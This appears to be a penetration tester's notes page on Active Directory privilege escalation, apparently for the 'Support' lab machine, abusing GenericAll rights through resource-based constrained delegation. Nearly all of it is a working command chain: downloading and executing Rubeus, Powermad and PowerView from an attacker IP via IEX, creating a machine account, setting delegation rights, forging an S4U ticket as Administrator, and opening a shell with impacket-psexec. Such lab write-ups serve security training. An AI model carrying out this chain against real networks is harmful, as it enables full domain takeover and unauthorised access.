Priv Esc

Outbound object rights

Generic all

We are going to create a new machine account
When you create accounts in AD you can specify the password
Now that we know the password the machine account, we can use it so sign tickets
We can then grab the SID
We then add the ability for to act on the behalf of other identities to the new computer
This will allow the computer to sign Kerberos rickets for other users other than itself (S4U)
Now we can forge a ticket from the Administrator that comes this machine and machines in the domain will trust it
Use the ticket to get a pop a shell

GitHub - Kevin-Robertson/Powermad: PowerShell MachineAccountQuota and DNS exploit toolsGitHub

GitHub - PowerShellMafia/PowerSploit at devGitHub

SharpCollection/NetFramework_4.7_x64/Rubeus.exe at master · Flangvik/SharpCollectionGitHub

*Evil-WinRM* PS C:\Users\support\Documents> cd C:\programdata
*Evil-WinRM* PS C:\programdata> curl 10.10.14.3/Rubeus.exe -o Rubeus.exe
*Evil-WinRM* PS C:\programdata> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/Powermad.ps1')
*Evil-WinRM* PS C:\programdata> IEX(New-Object Net.WebClient).downloadString('http://10.10.14.3/PowerView.ps1')

Test permissions

Get-DomainObject -Identity 'DC=SUPPORT,DC=HTB' | select ms-ds-machineaccountquota

10 machines can be created

 New-MachineAccount -MachineAccount Adot8Machine -Password $(ConvertTo-SecureString 'adot8' -AsPlainText -Force)

$ComputerSid = Get-DomainComputer Adot8Machine -Properties objectsid | Select -Expand objectsid

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Get-DomainComputer Adot8Machine | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}

.\Rubeus.exe hash /password:adot8

.\Rubeus.exe s4u /user:Adot8Machine$ /rc4:872E7BD85E304E2AF28DFE1BDAF25D8B /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /ptt

Paste contents into ticket.kirbi.b64 and remove spaces

base64 -d ticket.kirbi.b64 > ticket.kirbi

ticketConverter.py ticket.kirbi ticket.ccache

export KRB5CCNAME=ticket.ccache

impacket-psexec -k -no-pass support.htb/[email protected]

PreviousEnumeration NextCredentials

Last updated 1 year ago

Was this helpful?